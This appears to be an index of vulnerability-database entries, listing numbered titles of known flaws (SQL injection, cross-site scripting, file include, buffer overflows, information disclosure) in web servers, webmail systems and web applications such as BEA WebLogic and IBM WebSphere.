[31573] WebGUI username parameter cross-site scripting
[31571] BEA WebLogic Server and WebLogic Express config.xml weak security
[31569] BEA WebLogic Server and WebLogic Express .ear information disclosure
[31563] BEA WebLogic Server and WebLogic Express WS-Security man-in-the-middle
[31561] BEA WebLogic Server T3 denial of service
[31560] BEA WebLogic Server JDBCDataSourceFactory plaintext password
[31559] BEA WebLogic Server certificate security bypass
[31558] BEA WebLogic Server SSL man-in-the-middle
[31557] BEA WebLogic Server and WebLogic Express Apache proxy plug-in denial of service
[31545] IBM WebSphere Application Server trace information disclosure
[31544] IBM WebSphere Application Server JSP code source disclosure
[31542] IBM WebSphere Application Server unspecified information disclosure
[31514] iPlanet Web Server NS-max-records parameter cross-site scripting
[31510] Okul Web Otomasyon Sistemi etkinlikbak.asp SQL injection
[31501] FdWeB Espace Membre _admin/admin_menu.php file include
[31498] WebGUI unspecified cross-site scripting
[31458] BlueZ Human Interface Device (HID) unauthorized access
[31382] Direct Web Remoting (DWR) servlet engine denial of service
[31377] Direct Web Remoting (DWR) include/exclude security bypass
[31360] MOTIONBORG Web Real Estate admin_check_user.asp SQL injection
[31347] Magic Photo Storage Website config parameter file include
[31338] Webulas Uyelik db.mdb information disclosure
[31324] OmniWeb JavaScript alert() function format string
[31261] Simple Web Content Management System page.php SQL injection
[31260] @Mail WebMail System Webadmin cross-site scripting
[31259] @Mail WebMail System unspecified cross-site request forgery
[31173] WebText CMS profile name code execution
[31161] Durian Web Application Server request handling buffer overflow
[31153] AIDeX Mini-WebServer HTTP request denial of service
[31123] ScriptFrenzy.com Host Directory Pro and Alstrasoft Web Host Directory admin security bypass
[31122] ScriptFrenzy.com Host Directory Pro and Alstrasoft Web Host Directory database information disclosure
[31111] Application RPC interface buffer overflow
[31108] ScriptFrenzy.com Host Directory Pro and Alstrasoft Web Host Directory unspecified path disclosure
[31078] Enthrallweb eCars types.asp SQL injection
[31077] Enthrallweb eJobs newsdetail.asp SQL injection
[31076] Enthrallweb eMates newsdetail.asp SQL injection
[31073] Enthrallweb ePages actualpic.asp SQL injection
[31072] Enthrallweb eClassifieds myprofile.asp security bypass
[31068] Enthrallweb eCoupons myprofile.asp security bypass
[31065] Enthrallweb eNews myprofile.asp security bypass
[31052] WeBWorK Program Generation Language macro security bypass
[31049] web-app.net WebAPP Network Edition unspecified security bypass
[31048] web-app.org WebAPP and web-app.net WebAPP Network Edition unspecified cross-site scripting
[31025] @Mail WebMail System filter evasion cross-site scripting
[31012] Serendipity PHP Weblog System Entry Manager module cross-site request forgery
[30998] Novell NetWare Welcome web-app cross-site scripting
[30977] Mini Web Shop viewcategory.php path disclosure
[30976] Mini Web Shop viewcategory.php cross-site scripting
[30954] WebCalendar export_handler.php cross-site scripting
[30945] IBM WebSphere Application Server Servlet Engine/Web Container information disclosure
[30943] IBM WebSphere Application Server General component unspecified
[30915] mxBB Web Links Module lang_admin.php file include
[30903] IBM WebSphere Application Server Utility Classes unspecified
[30846] Skulls! Multi-Network WebCache multiple unspecified
[30826] IBM WebSphere Host On-Demand (HOD) pnl parameter authentication bypass
[30823] Barman interface.php file include
[30792] WebHost Manager (WHM) multiple scripts cross-site scripting
[30693] SquirrelMail webmail.php and compose.php cross-site scripting
[30686] IBM Websphere EAL4 authentication unspecified
[30684] IBM WebSphere Application Server unspecified
[30674] Xerox WorkCentre WebUI code execution
[30662] Sun Java System Application and System Web Server proxy cross-site request forgery
[30645] Apple Mac OS X WebKit code execution
[30538] REMLAB Web Mech Designer calculate.php path disclosure
[30528] Wallpaper Website wallpaper.php SQL injection
[30509] Recipes Complete Website list.php SQL injection
[30507] WebHost Manager (WHM) multiple scripts cross-site scripting
[30434] my little weblog weblog.php cross-site scripting
[30401] phpWebThings core/editor.php file include
[30396] BestWebApp Dating Site login_form.asp cross-site scripting
[30394] BestWebApp Dating Site Login SQL injection
[30371] DEV web management system configuration parameter file include
[30309] Helm WebHosting Control Panel domains.asp, users.asp and default.asp cross-site scripting
[30308] Kerio WebSTAR privilege escalation
[30261] WWWeb Concepts prodtype.asp and product.asp SQL injection
[30240] Web based bibliography management system (Aigaion) DIR file include
[30126] FreeWebshop index.php cross-site scripting
[30125] FreeWebshop page directory traversal
[30075] Easy Chat Server Web root information disclosure
[30055] IBM WebSphere Application Server FAULTACTOR cross-site scripting
[30049] Essentia Web Server HTTP GET request buffer overflow
[30020] Webdrivers Simple Forum message_details.php SQL injection
[30009] Web Directory Pro backup_db.php and options.php security bypass
[29997] BlooMooWeb ActiveX control BW_DeleteTempFile() denial of service
[29991] FreeWebshop.org index.php directory traversal
[29990] FreeWebshop.org logging in SQL injection
[29982] SAP Web Application Server named pipe privilege escalation
[29981] SAP Web Application Server enserver.exe denial of service
[29980] SAP Web Application Server unspecified file disclosure
[29976] Easy Address Book Web Server NTFS information disclosure
[29968] BlooMooWeb ActiveX insecure methods command execution
[29930] Daronet Internet Solutions website platform ViewImage.asp cross-site scripting
[29928] Mirapoint Web Mail expression() cross-site scripting
[29925] Easy File Sharing Web Server NTFS information disclosure
[29923] Easy File Sharing Web Server forum thread cross-site scripting
[29905] Business Card Web Builder (BCWB) root_path_admin file include
[29898] WebWizForum search.asp SQL injection
[29885] Soft3304 04WebServer URL string processing information disclosure
[29880] WWWeBBB Forum page.cgi directory traversal
[29861] Simple Website Software (SWS) common.php file include
[29826] MiniHTTP Web Forum &
[29820] D-Link webcm cross-site scripting
[29818] D-Link webcm directory traversal
[29815] INCA IM-204 webcm directory traversal
[29806] Sun Java System and iPlanet Messaging Servers Webmail module cross-site scripting
[29721] MDweb132 chemin_appli file include
[29717] Highwall Enterprise and Highwall Endpoint management interface cross-site scripting
[29716] Highwall Enterprise and Highwall Endpoint management interface multiple SQL injection
[29715] Trawler Web CMS path-red2 file include
[29712] Web Group Communication Center (WGCC) quiz.php SQL injection
[29659] DEV Web management system index.php cross-site scripting
[29653] Webmedia Explorer core.lib.php file include
[29642] IBM WebSphere WSN authentication bypass
[29641] IBM WebSphere unspecified security exposure
[29591] PHP Top webs config.php file include
[29563] WebSPELL index.php SQL injection
[29553] NuralStorm Webmail process.php file include
[29446] Asbru Web Content Management Aspell command execution
[29397] WebYep webyep_sIncludePath parameter file include
[29338] TeraStation administration interface cross-site request forgery
[29296] Apple Mac OS X and Mac OS X Server WebObjects incorrect privilege dropping
[29288] VAMP Webmail setup/yesno.phtml file include
[29285] phpMyWebmin target parameter file include
[29259] phpMyWebmin window.php or home.php information disclosure
[29258] phpMyWebmin window.php or home.php file include
[29223] PHPSelect Web Development Division index.php3 file include
[29167] WEB//NEWS parser.php file include
[29119] Web-News template.php file include
[29103] xweblog kategori.asp SQL injection
[29091] Neon WebMail for Java username cross-site scripting
[29090] Neon WebMail for Java multiple directory traversal
[29089] Neon WebMail for Java updateuser security bypass
[29088] Neon WebMail for Java addrlist and maillist SQL injection
[29087] Neon WebMail for Java updatemail insecure data
[29086] Neon WebMail for Java JSP file upload
[29069] Dr. Web LHA archive buffer overflow
[29039] Business Card Web Builder (BCWB) startup.inc.php file include
[29037] DigitalWebShop _PHPLIB[libdir] parameter file include
[28984] Roller Weblogger multiple fields cross-site scripting
[28898] webSPELL squads.php SQL injection
[28896] webSPELL src/login.php authentication bypass
[28851] MyABraCaDaWeb index.php and pop.php file include
[28815] Web Server Creator customize.php and index.php file include
[28776] WebAdmin MDaemon privilege escalation
[28759] Web Dictate admin unauthorized access
[28752] Easy Address Book Web Server URL format string
[28701] Webmin and Usermin unspecified cross-site scripting
[28699] Webmin and Usermin source code disclosure
[28665] iWebNegar comments.php SQL injection
[28663] iWebNegar comments.php cross-site scripting
[28636] SAP-DB and MaxDB WebDBM HTTP request buffer overflow
[28621] Sun Java Plug-in and Java Web Start JRE security bypass
[28618] Web3news include/_class.security.php file include
[28607] IBM WebSphere Application Server ThreadIdentitySupport unspecified vulnerabilities
[28603] IBM WebSphere Application Server unspecified information disclosure
[28590] CliServ Web Community cl_headers file include
[28579] IBM WebSphere Application Server unspecified information disclosure
[28577] IBM WebSphere Application Server multiple unspecified vulnerabilities
[28557] WEBinsta CMS modules/usersonline/users.php file include
[28489] WebAdmin userlist.wdm privilege escalation
[28488] WebAdmin logfile_view.wdm and configfile_view.wdm directory traversal
[28426] WebTorrent (Wtcom) torrents.php SQL injection
[28371] WEBinsta CMS index.php file include
[28355] 04WebServer user identification bypass
[28354] 04WebServer error page cross-site scripting
[28350] Webring component for Joomla! admin.webring.docs.php file include
[28340] WEBinsta mailing list manager install3.php file include
[28336] Symantec VERITAS Backup Exec for Windows Server RPC interface buffer overflow
[28320] Hitweb genpage-cgi.php file include
[28317] TinyWebGallery image.php file include
[28314] SaveWeb Portal index.php file include
[28292] Comet WebFileManager (Cwfm) checkupload.php file include
[28287] Archangel Weblog name and comment field cross-site scripting
[28249] SQLiteWebAdmin tpl.inc.php directory file include
[28230] Computer Associates (CA) eTrust AntiVirus WebScan ActiveX improper timestamp verification
[28229] Computer Associates (CA) eTrust Antivirus WebScan ActiveX filelist.txt buffer overflow
[28226] Computer Associates (CA) eTrust AntiVirus WebScan ActiveX Automatic Update code execution
[28211] Novell GroupWise WebAccess UTF-7 encoding cross-site scripting
[28210] Novell GroupWise WebAccess cross-site scripting
[28182] SaveWeb Portal SITE_Path file include
[28149] Apple Mac OS X WebKit deallocated object code execution
[28069] AWBS (Advanced Webhost Billing System) contact.php cross-site scripting
[27949] EVA-Web perso and aide parameters path disclosure
[27804] Microsoft Internet Explorer WebViewFolderIcon ActiveX object code execution
[27797] WebScarab URI cross-site scripting
[27786] WebEx ActiveX control multiple buffer overflows
[27780] Visnetic Mail Server, Merak Mail Server and IceWarp Web Mail "
[27773] Visnetic Mail Server, Merak Mail Server and IceWarp Web Mail /accounts/inc/include.php and /admin/inc/include.php file include
[27685] Drupal webform module unspecified cross-site scripting
[27655] FlexWATCH unspecified Web server cross-site scripting
[27643] MIMEsweeper for Web RAR archive Web Policy Engine denial of service
[27637] Webvizyon Portal SayfalaAltList.asp SQL injection
[27586] BEA WebLogic Server or BEA WebLogic Express is running
[27526] PhpWebGallery comments.php cross-site scripting
[27442] Cisco Wireless Control System (WCS) HTTP interface information disclosure
[27441] Cisco Wireless Control System (WCS) HTTP interface cross-site scripting
[27437] Cisco Access Point Web browser unauthorized administrative access
[27389] WeBBoA Hosting host/yeni_host.asp SQL injection
[27371] UebiMiau Webmail multiple scripts cross-site scripting
[27366] Webmin backslash directory traversal
[27309] Open WebMail openwebmail-main.pl cross-site scripting
[27288] Microsoft Internet Explorer ASCII encoded Web filter bypass
[27272] Webroot Spy Sweeper filename security bypass
[27268] Webroot Spy Sweeper Spy Communication Shield Web filter security bypass
[27266] Webroot Spy Sweeper archive Compression Sweep bypass
[27264] Webroot Spy Sweeper Startup-Shield security bypass
[27130] FORM2MAIL and WebFORM email header injection
[27086] Cisco VPN 3000 and Cisco ASA 5500 WebVPN cross-site scripting
[27061] aWebNews visview.php file include
[27039] WebprojectDB nav.php and lang.php file include
[27007] aWebNews login.php information disclosure
[26975] WeBWork PG Problem Editor security bypass
[26939] TIBCO Rendezvous daemon HTTP administrative interface buffer overflow
[26938] TIBCO Hawk Monitoring Agent configuration interface buffer overflow
[26937] aspWebLinks links.asp SQL injection
[26928] Weblog Oggi comment cross-site scripting
[26910] WebspotBlogging "
[26891] EVA-Web article-album.php3 and rubrique.php3 cross-site scripting
[26885] My Web Server HTTP request denial of service
[26878] VMware ESX Server management interface cross-site scripting
[26856] F@cile Interactive Web index.php information disclosure
[26854] F@cile Interactive Web themes file include
[26841] F@cile Interactive Web p-editpage.php and p-editbox.php file include
[26839] F@cile Interactive Web p-popupgallery.php file include
[26799] Multiple F-Secure products Web Console HTTP request buffer overflow
[26748] WebCalendar includes/config.php information disclosure
[26706] Symantec AntiVirus and Client Security remote management interface buffer overflow
[26694] V-Webmail core.php file include
[26680] IceWarp Web Mail PHPSESSID cross-site scripting
[26666] HyperStop Web Host Directory "
[26665] AlstraSoft Web Host Directory "
[26661] HyperStop Web Host Directory multiple path disclosure
[26658] HyperStop Web Host Directory search/index.php SQL injection
[26656] AlstraSoft Web Host Directory multiple scripts path disclosure
[26653] AlstraSoft Web Host Directory search/index.php SQL injection
[26634] Apple Xcode Tools WebObjects plug-in unauthorized access
[26622] Multiple MyWeb products SQL injection
[26608] PunkBuster WebTool component buffer overflow
[26605] Destiney Rated Images Script addweblog.php and leaveComments.php cross-site scripting
[26566] IBM WebSphere Application Server FFDC logs plaintext LDAP passwords
[26565] IBM WebSphere Application Server embedded script tag script execution
[26564] IBM WebSphere Common Configuration Mode trace information disclosure
[26563] IBM WebSphere Application Server administrative console unauthorized access
[26562] IBM WebSphere Application Server unauthorized EJB access on Solaris
[26560] IBM WebSphere Application Server addNode.log plaintext account credentials
[26559] IBM WebSphere HTTP request handlers information disclosure
[26544] Bitrix CMS administration interface cross-site scripting
[26522] Spymac WebOS index.php, get_ipod.php and login.php cross-site scripting
[26478] Caucho Resin Web server URL encoded backslash directory traversal
[26468] BEA WebLogic Server domain name disclosure
[26467] BEA WebLogic Server stopWeblogic.sh password disclosure
[26466] BEA WebLogic Server private key disclosure
[26465] BEA WebLogic Server internal network information disclosure
[26464] BEA WebLogic Server Administration Console insecure custom JDBC policies
[26463] BEA WebLogic Server failed login cleartext password log
[26462] BEA WebLogic Server Administration Console IP disclosure
[26461] BEA WebLogic Server JSP error source code disclosure
[26460] BEA WebLogic Server admin password reset cleartext
[26459] BEA WebLogic Server Quality of Service insecure transaction channel
[26458] BEA WebLogic Server JTA transactions information disclosure
[26421] Web-Labs CMS search and alerts cross-site scripting
[26345] openEngine website.php file include
[26338] 3Com TippingPoint SMS Server management interface information disclosure
[26326] Website Baker user display name field cross-site scripting
[26312] IBM WebSphere welcome page authentication bypass
[26308] Cisco PIX/ASA/FWSM using WebSense/N2H2 content filtering bypass
[26294] Xeneo Web Server script source disclosure
[26284] OpenVPN remote management interface no authentication
[26277] PhpWebGallery search.php cross-site scripting
[26262] WebCalendar includes/user.php information disclosure
[26260] Web4Future News Portal comentarii.php and view.php SQL injection
[26259] Web4Future News Portal comentarii.php and view.php cross-site scripting
[26246] Big Webmaster Guestbook comment fields cross-site scripting
[26198] Blog Mod weblog_posting.php SQL injection
[26196] WEBInsta Limbo sql.php file include
[26159] SWS Web Server sws_web_server.c and ayardosyasi.h buffer overflow
[26158] SWS Web Server sws_web_server.c and ayardosyasi.h format string
[26151] Network Administration Visualized report interface SQL injection
[26105] Open WebMail multiple openwebmail scripts cross-site scripting
[26079] PhpWebGallery picture.php security bypass
[26067] phpWebFTP index.php cross-site scripting
[25980] Websense "
[25921] phpWebFTP script.js information disclosure
[25920] phpWebFTP index.php directory traversal
[25867] phpWebSite index.php hub_dir file include
[25831] TinyWebGallery index.php cross-site scripting
[25802] TalentSoft Web+Shop webplus.exe path disclosure
[25800] Aweb Script Seller payment security bypass
[25799] phpWebSite topics.php SQL injection
[25782] Aweb's Banner Generator index.php cross-site scripting
[25733] PHPWebGallery category.php and picture.php cross-site scripting
[25732] APT-WEBSHOP-SYSTEM modules.php path disclosure
[25731] APT-WEBSHOP-SYSTEM modules.php SQL injection
[25721] TalentSoft Web+Shop deptname parameter cross-site scripting
[25698] Cherokee Web Server handler_error.c cross-site scripting
[25621] McAfee WebShield SMTP server format string
[25619] IBM WebSphere HTTP header denial of service
[25590] aWebNews login.php, fpass.php and visview.php SQL injection
[25589] aWebNews visview.php cross-site scripting
[25587] aWebBB multiple scripts SQL injection
[25586] aWebBB BBCode cross-site scripting
[25585] aWebBB multiple scripts cross-site scripting
[25574] Hitachi Groupmax World Wide Web cross-site scripting
[25550] Microsoft Exchange Outlook Web Access cross-site scripting
[25539] WebCalendar multiple .php scripts path disclosure
[25474] Connect Daily Web Calendar multiple cross-site scripting
[25443] WEBalbum skin2 parameter file include
[25435] web-app.org WebAPP index.cgi cross-site scripting
[25431] Web Quiz Pro prequiz.asp and student.asp cross-site scripting
[25428] webcheck content cross-site scripting
[25418] Quick 'n Easy Web Server ASP source code disclosure
[25417] Baby Web Server ASP source code disclosure
[25390] RSA SecurID IISWebAgentIF.dll buffer overflow
[25375] 1WebCalendar multiple scripts path disclosure
[25373] 1WebCalendar multiple scripts SQL injection
[25348] BEA WebLogic Server and Express XML parser denial of service
[25347] BEA WebLogic Server default servlet unauthorized system access
[25345] BEA WebLogic Portal JSR-168 Portlet disclosure
[25328] phpWebSite friend.php and article.php SQL injection
[25315] MailEnable webmail component denial of service
[25295] Maian Weblog print.php and mail.php SQL injection
[25175] Xerox CopyCentre and WorkCentre Pro Web server memory corruption denial of service
[25142] Archangel Weblog index.php file include
[25136] Easy File Sharing Web Server description cross-site scripting
[25135] Easy File Sharing Web Server logging denial of service
[25031] Apple Mac OS X WebKit buffer overflow
[25030] Joomla! admin interface SQL injection
[25003] SAP Web Application Server HTTP response injection information disclosure
[24984] Archangel Weblog admin cookie authentication bypass
[24979] NetworkActiv Web Server .php script source code disclosure
[24973] IBM WebSphere Application Server JSP source disclosure
[24944] Website Generator process3.php file include
[24931] MUTE P2P mWebCache security bypass
[24903] WebDrive name field buffer overflow
[24877] WEBInsta Limbo Contact Form cross-site scripting
[24875] DEV Web management system City/Region cross-site scripting
[24860] RoundCube Webmail _task parameter error message path disclosure
[24847] SquirrelMail webmail.php cross-site scripting
[24839] cPanel dowebmailforward.cgi cross-site scripting
[24824] Scientific Atlanta WebSTAR DPX2100 LanD packet denial of service
[24762] D-Link DWL-G700AP administrative interface denial of service
[24758] Leif M. Wright's Web Blog headers cross-site scripting
[24757] Leif M. Wright's Web Blog sendmail command execution
[24755] Leif M. Wright's Web Blog blog.cgi authentication bypass
[24754] V-webmail help.php path disclosure
[24753] V-webmail frameset.php spoofing
[24752] Leif M. Wright's Web Blog .txt obtain information
[24751] SAP Business Connector administrative interface spoofing
[24749] V-webmail preferences.personal.php cross-site scripting
[24736] WordPress author website field cross-site scripting
[24729] Web Calendar Pro dropbase.php SQL injection
[24708] webSPELL search.php SQL injection
[24695] WebGUI "
[24693] noweb lib/toascii.nw and shell/roff.mm symlink
[24692] PerlBlog weblog.pl command execution
[24691] PerlBlog weblog.pl cross-site scripting
[24690] PerlBlog weblog.pl directory traversal
[24657] Hasbani Web Server GET denial of service
[24626] Fortinet FortiGate Web filter URL bypass
[24614] IBM Lotus Domino Web Access attachment file name cross-site scripting
[24613] IBM Lotus Domino Web Access javascript: URL cross-site scripting
[24612] IBM Lotus Domino Web Access "
[24611] IBM Lotus Domino Web Access .html attachment cross-site scripting
[24609] e/pop WebConference Server topic cross-site scripting
[24595] IBM WebSphere tracing for session manager information disclosure
[24568] Sun Java Web Start JNLP privilege elevation
[24517] MailEnable Enterprise webmail denial of service
[24491] Microsoft Windows MSRPC WebClient service message buffer overflow
[24462] 4D WebSTAR Mailbox Server denial of service
[24433] Multiple Mozilla products QueryInterface memory corruption
[24432] Multiple Web browser long title history.dat denial of service
[24370] WebEx ActiveX control DLL code execution
[24355] Phpclanwebsite index.php SQL injection
[24322] WeBWork privileged user command execution
[24317] Kerio WinRoute firewall Web browsing denial of service
[24316] Ensim WEBppliance ocw_login_username cross-site scripting
[24304] Virata-EmWeb unauthorized DSL modem access
[24302] BEA WebLogic Server and Express SSL identity exposure
[24301] BEA WebLogic Server and Express connection filter denial of service
[24299] BEA WebLogic Server JDNI security policy weakness
[24298] BEA WebLogic Server security provider weakness
[24297] BEA WebLogic Portal deployment descriptor information disclosure
[24295] BEA WebLogic Server and Express log file information disclosure
[24294] BEA WebLogic Server and Express Java MBean unauthorized access
[24293] BEA Weblogic Portal WSRP unauthorized access
[24291] BEA WebLogic application code information disclosure
[24290] BEA WebLogic Server and Express password information disclosure
[24286] BEA WebLogic Server unauthorized cross domain management
[24284] BEA WebLogic Portal config.xml information disclosure
[24231] Phpclanwebsite IMG BBcode tag cross-site scripting
[24222] WebspotBlogging login.php SQL injection
[24211] IBM Lotus Domino Web module unspecified cross-site scripting
[24176] Cisco IOS HTTP management interface CDP status page cross-site scripting
[24159] Apache Geronimo Web-Access-Log Viewer cross-site scripting
[24100] IronWall webserver default file access
[24097] Orjinweb E-commerce URL file include
[24079] Orion Web Server 404 error cross-site scripting
[24053] WebGUI forms module cross-site scripting
[24048] Web Wiz Forums search_form.asp cross-site scripting
[24027] TheWebForum login.php SQL injection
[24018] SysCP WebFTP webftp_language webftp.php file include
[24011] Apple AirPort Express and Extreme network interface denial of service
[24007] TheWebForum register.php cross-site scripting
[23985] Open-Xchange Webmail HTML cross-site scripting
[23963] Chimera Web Portal System linkcategory.php SQL injection
[23962] Chimera Web Portal System modules.php cross-site scripting
[23941] BlackBerry Device Software Web browser JAD file denial of service
[23931] Multiple Web Wiz Products check_user.asp SQL injection
[23923] VEGO Web Forum index.php SQL injection
[23922] Microsoft Windows embedded Open Type Web font buffer overflow
[23891] DSM Light Web File Browser explorer.php directory traversal
[23888] Resin Web Server DOS con device request denial of service
[23884] Webwasher CSM Suite security bypass
[23880] VMware ESX Server management interface code execution
[23867] MIMEsweeper/Websweeper attachment content filtering bypass
[23842] DOOW could allow Web site content to be accessed
[23840] WebDB search module SQL injection
[23807] Tolva PHP website system file include
[23770] WebCal webcal.cgi cross-site scripting
[23737] PHP Webthings multiple scripts SQL injection
[23690] Webglimpse webglimpse.cgi cross-site scripting
[23680] JRun Web Server long URL buffer overflow
[23679] IBM WebSphere Application Server usernames information disclosure
[23677] IBM WebSphere multiple scripts allow cross-site scripting
[23662] PhpWebGallery multiple scripts SQL injection
[23642] MarmaraWeb "
[23634] MarmaraWeb page parameter allows code execution
[23616] Business Objects WebIntelligence account lockout denial of service
[23572] Website Baker username SQL injection
[23565] PHPWebThings download.php ref SQL injection
[23520] Webmin run.cgi script creates insecure temporary files
[23482] WebCalendar login enumeration
[23480] WebCalendar layers_toggle.php response splitting
[23476] WebCalendar edit_report_handler.php SQL injection
[23415] Web4Future Affiliate Manager PRO functions.php SQL injection
[23391] FreeWebStat stat.php search cross-site scripting
[23387] FreeWebStat logdb.html cross-site scripting
[23386] PHP Web Statistik disk quota denial of service
[23385] PHP Web Statistik referer field cross-site scripting
[23384] PHP Web Statistik stat.php denial of service
[23382] PHP Web Statistik stat.cfg and logdb.dta obtain information
[23379] PHP Web Statistik cross-site scripting
[23370] WebCalendar export_handler.php allows files to be overwritten
[23369] WebCalendar multiple scripts allow SQL injection
[23342] Apple Safari Webkit code execution
[23283] AllWeb Search index.php script allows SQL injection
[23277] Webmin miniserv.pl Web server component username format string
[23234] Web Wiz Forums allows message titles to be obtained in hidden forums
[23208] Softbiz Web Hosting Directory Script multiple SQL injections
[23174] IBM WebSphere BBOORB heap corruption
[23164] Sony SunnComm MediaMax AxWebRemoveCtrl ActiveX code execution
[23126] Hitachi WirelessIP5000 HTTP interface configuration access
[23086] LiteSpeed Web Server /admin/config/confMgr.php cross-site scripting
[23047] PHPWebThings download.php script allows SQL injection
[23040] Linux kernel sysctl interface denial of service
[23031] SAP Web Application Server sap-exiturl HTTP header injection
[23030] SAP Web Application Server sapexiturl response splitting
[23029] SAP Web Application Server error message script injection
[23027] SAP Web Application fameset.htm and SYSTEM PUBLIC cross-site scripting
[23017] toendaCMS sensitive information stored in the Web root directory
[23011] Apple Mac OS X kernel interface information disclosure
[22972] PHPWebThings forum.php script could allow SQL injection
[22948] F-Secure Web Console directory traversal
[22834] eBASEweb SQL injection
[22768] WEBADMIN login SQL injection
[22750] YaPiG Website cross-site scripting
[22735] phpWebSite search SQL injection
[22733] GFi MailSecurity Web module buffer overflow
[22730] WebGUI unknown code execution
[22722] Merak Mail Server and IceWarp Web Mail help.html directory traversal
[22719] BEA WebLogic Server and Express invalid login brute force
[22718] BEA WebLogic Server and Express servlet relative forwarding denial of service
[22716] BEA WebLogic Server and Express HTTP request smuggling
[22595] BEA WebLogic Server and Express MBean file audits may fail
[22593] BEA WebLogic Server and Express multicast message information disclosure
[22592] BEA WebLogic Server and Express weblogic.Deployer information disclosure
[22591] BEA WebLogic Server and Express allows admin user to be locked out
[22590] BEA WebLogic Server and Express IIOP protocol information disclosure
[22588] BEA WebLogic Server and Express password disclosure
[22586] BEA WebLogic Server and Express system properties disclosure
[22584] BEA WebLogic Server and Express fullyDelegateAuthorization could allow access to servlet
[22583] PHP Advanced Transfer Manager web root cross-site scripting
[22582] BEA WebLogic Server and Express Configuration Wizard information disclosure
[22579] BEA WebLogic Server and Express security policy import
[22577] BEA WebLogic Server and Express restriction of servlet allows access to files
[22575] BEA WebLogic Server and Express internal servlet allows unauthorized access
[22574] BEA WebLogic Server and Express privilege escalation
[22573] BEA WebLogic Server and Express passphrase in plain text
[22572] BEA WebLogic Server and Express IP address disclosure
[22571] BEA WebLogic Server and Express audit events allow security bypass
[22569] BEA WebLogic Server and Express Deployer allows elevated privileges
[22568] BEA WebLogic Server and Express connection disclosure
[22567] BEA WebLogic Server and Express SSL password disclosure
[22563] BEA WebLogic Server and Express thread handling denial of service
[22546] Sun Java System Directory Server HTTP admin interface code execution
[22530] Webroot Desktop Firewall DeviceIoControl() bypass security
[22529] Webroot Desktop Firewall PWIWrapper.dll buffer overflow
[22519] Symantec AntiVirus Scan Engine Administrator Interface buffer overflow
[22485] Merak Mail Server and IceWarp Web Mail logout.html file deletion
[22484] Merak Mail Server and IceWarp Web Mail bw_list.inc path disclosure
[22483] Merak Mail Server and IceWarp Web Mail multiple scripts cross-site scripting
[22440] vxWeb coredll.dll file denial of service
[22423] CJ Web2Mail thankyou.php or web2mail.php script, cross-site scripting
[22408] ContentServ ctsWebsite parameter PHP file include
[22392] Apple Mac OS X Web archives cross-site scripting
[22379] Microsoft Internet Explorer Web content controlled cross-site scripting
[22338] Microsoft Internet Information Server WebDAV request source code disclosure
[22333] Webmin and Usermin authentication security bypass
[22332] ClearQuest Web client cross-site scripting
[22306] Content2Web index.php information disclosure
[22305] Content2Web index.php cross-site scripting
[22304] Content2Web index.php SQL injection
[22303] Content2Web show script execution
[22288] Groove Virtual Office Weblinks script injection
[22256] man2web multiple scripts command execution
[22253] Linksys WRT54G and WRT54GS management interface POST method handlers denial of service
[22233] PunBB administration interface SQL injection
[22225] Spymac Web category variable cross-site scripting
[22210] Sun Java System Web Proxy Server unknown denial of service
[22202] Open WebMail sessionid parameter cross-site scripting
[22188] WebArchiveX component file manipulation
[22180] WEB//NEWS startup.php script path disclosure
[22179] WEB//NEWS news.php and print.php scripts SQL injection
[22158] SqWebMail HTML comment cross-site scripting
[22136] WebCalendar includedir parameter file include
[22127] Savant Web Server registry stores passwords
[22124] WebGUI multiple modules code execution
[22099] Multiple vendor Web scanner command execution
[22092] SaveWebPortal JavaScript code execution
[22085] SaveWebPortal multiple scripts cross-site scripting
[22083] SaveWebPortal menu_dx.php and menu_sx.php scripts PHP file include
[22080] SaveWebPortal header.php script administrative bypass
[22046] phpWebNotes php_api.php cross-site scripting
[22043] SqWebMail HTML cross-site scripting
[22041] BEA WebLogic Server and Express LDAP anonymous bind information disclosure
[22040] phpWebNotes php_api.php script file include
[22008] YusASP Web Asset Manager assetmanager.asp gain access
[21998] WebCalendar send_reminders.php file include
[21997] SqWebMail Content-Type header script execution
[21986] SaveWeb Portal file include
[21984] BEA WebLogic Server and Express View Error Log cross-site scripting
[21971] BEA WebLogic Portal user authorization allows security bypass
[21909] phpWebSite index.php module SQL injection
[21898] Apple Mac OS X SecurityInterface password disclosure
[21849] Apple Mac OS X Weblog Server cross-site scripting
[21844] Xitami Webserver /Con/Con denial of service
[21766] MSN Web Messenger has been detected
[21749] Novell NetWare Enterprise Web Server directory disclosure
[21722] Lantronix Secure Console Server command interface command execution
[21702] Microsoft Internet Explorer Web Folder Behaviors zone bypass
[21696] NetworkActiv Web Server cross-site scripting
[21694] web content management AddModifyInput.php create account
[21689] web content management multiple script cross-site scripting
[21670] nCipher Cryptographic Hardware Interface Library forked process disclosure
[21661] Simplicity oF Upload download.php script can redirect Web page
[21637] Thomson Web Skill Vantage Manager login SQL injection
[21634] Website Baker Project admin/media file upload
[21633] Website Baker Project URL path disclosure
[21631] Website Baker browse.php cross-site scripting
[21627] apage Module for WebAPP apage.cgi command execution
[21597] McAfee WebShield appliance default login
[21541] SPIDynamics WebInspect cross-application scripting
[21535] Beehive forum webtag SQL injection
[21512] KF Web Server allows attacker to view directory listings
[21471] Yawp (Yet Another Web Program) conf_path file include
[21469] Website Generator path disclosure
[21468] Website Generator cross-site scripting
[21466] Website Generator image feature file upload
[21421] Novell GroupWise WebAccess component cross-site scripting
[21400] WebEOC resource bypass security
[21399] WebEOC public URI allows obtain information
[21398] WebEOC multiple SQL Injection
[21397] WebEOC large uploads cause denial of service attack
[21396] WebEOC multiple cross-site scripting
[21395] WebEOC weak algorithm
[21394] WebEOC common key weak security
[21382] Oracle9i Web Cache document weak security
[21364] Darwin Streaming Server Web admin denial of service
[21356] WPS Web-Portal-System wps_shop.cgi command execution
[21291] phpWebSite index.php SQL injection
[21264] JBoss org.jboss.we.WebServer class path disclosure
[21242] Cacti administrative interface command execution
[21212] Dynamic Biz Website Builder verify.asp script SQL injection
[21188] Multiple Web browser JavaScript denial of service
[21183] Webroot Window Washer file deletion
[21157] WebCalendar view_entry.php path disclosure
[21155] WebCalendar assistant_edit.php bypass security
[21137] ClamAV Sendmail milter interface denial of service
[21117] Symantec VERITAS Backup Exec Web Administration Console buffer overflow
[21115] Asterisk manager interface buffer overflow
[21104] Just William's Amazon Webstore multiple cross-site scripting
[21103] JustWilliam's Amazon Webstore HTTP response splitting
[21059] Amarok Web Frontend plugin information disclosure
[21058] JBoss org.jboss.web.WebServer class path disclosure
[21049] Athena Web Registration pass command execution
[21048] iPlanet (Sun ONE) Server/Sun ONE Messaging Server Webmail command execution
